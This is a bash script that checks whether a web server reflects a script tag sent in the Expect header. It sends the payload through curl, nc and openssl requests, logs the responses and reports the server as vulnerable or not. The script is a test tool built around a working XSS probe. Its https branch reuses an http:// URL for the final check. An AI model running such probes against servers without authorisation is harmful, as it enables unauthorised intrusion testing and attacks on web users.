#!/bin/bash

CMDNAME=`basename $0`
LOGPATH="./log/"
#OUTFILE="$LOGPATH$RESULT"

if [ $# -ne 3 ]; then
    echo "#### Error ####"
    echo "Usage: $CMDNAME {ipaddress} {port} [http or https]" 1>&2
    echo "Example: $CMDNAME 192.168.1.1 443 https"
    exit 1
fi

if [ ! -d $LOGPATH ]; then
    mkdir $LOGPATH
fi

if [ $3 = "http" ]; then
    COMMAND="nc $1 $2"
    CURL="curl -H 'Expect: <script>alert(1);</script>' -isk  http://$1:$2/"
    RESULT="$2_http_expect_$1_`date "+%Y%m%d%H%M"`.txt"
    OUTFILE="$LOGPATH$RESULT"
fi

if [ $3 = "https" ]; then
    COMMAND="openssl s_client -quiet -connect $1:$2"
    CURL="curl -H 'Expect: <script>alert(1);</script>' -isk  http://$1:$2/"
    RESULT="$2_https_expect_$1_`date "+%Y%m%d%H%M"`.txt"
    OUTFILE="$LOGPATH$RESULT"
fi

HDR1="User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
HDR2="Connection: close"
echo -e "\r\n\r\n********* Expect1 curl command ********" > $OUTFILE 2>&1
echo -e "# $CURL" >> $OUTFILE 2>&1 
curl -H "Expect: <script>alert(1);</script>" -isk $3://$1:$2/ >> $OUTFILE

echo -e "\r\n\r\n********* Expect2 HTTP/1.0 ********" >> $OUTFILE 2>&1
echo -e "# $COMMAND 2>/dev/null\r\nGET / HTTP/1.0\r\nHost: $1\r\nExpect: <script>alert(1);</script>\r\n$HDR1\r\n$HDR2\r\n\r\n" >> $OUTFILE 2>&1
echo -e "GET / HTTP/1.0\r\nHost: $1\r\nExpect: <script>alert(1);</script>\r\n$HDR1\r\n$HDR2\r\n\r\n" | $COMMAND 2>/dev/null >> $OUTFILE 2>&1


echo -e "\r\n\r\n********* Expect3 HTTP/1.1 ********" >> $OUTFILE 2>&1
echo -e "# $COMMAND\r\nGET / HTTP/1.1\r\nHost: $1\r\nExpect: <script>alert(1);</script>\r\n$HDR1\r\n$HDR2\r\n\r\n" >> $OUTFILE 2>&1
echo -e "GET / HTTP/1.1\r\nHost: $1\r\nExpect: <script>alert(1);</script>\r\n$HDR1\r\n$HDR2\r\n\r\n" | $COMMAND 2>/dev/null>> $OUTFILE 2>&1


#RESPONSE1=`echo -e "TRACE /$TARGET HTTP/1.1\r\nHost: $1\r\n$HDR1\r\n$HDR2\r\n\r\n" | $COMMAND`
RESPONSE2=`$CURL`

if echo "$RESPONSE2" | grep "<script>alert(1);</script>" > /dev/null; then
    echo "---- VULNERABLE ----" | tee $RESULT
    echo -e "\r\n# $CURL" >> $RESULT
    echo "$RESPONSE2" >> $RESULT
else
    echo "---- NOT VULNERABLE ----" | tee $RESULT
fi

exit 

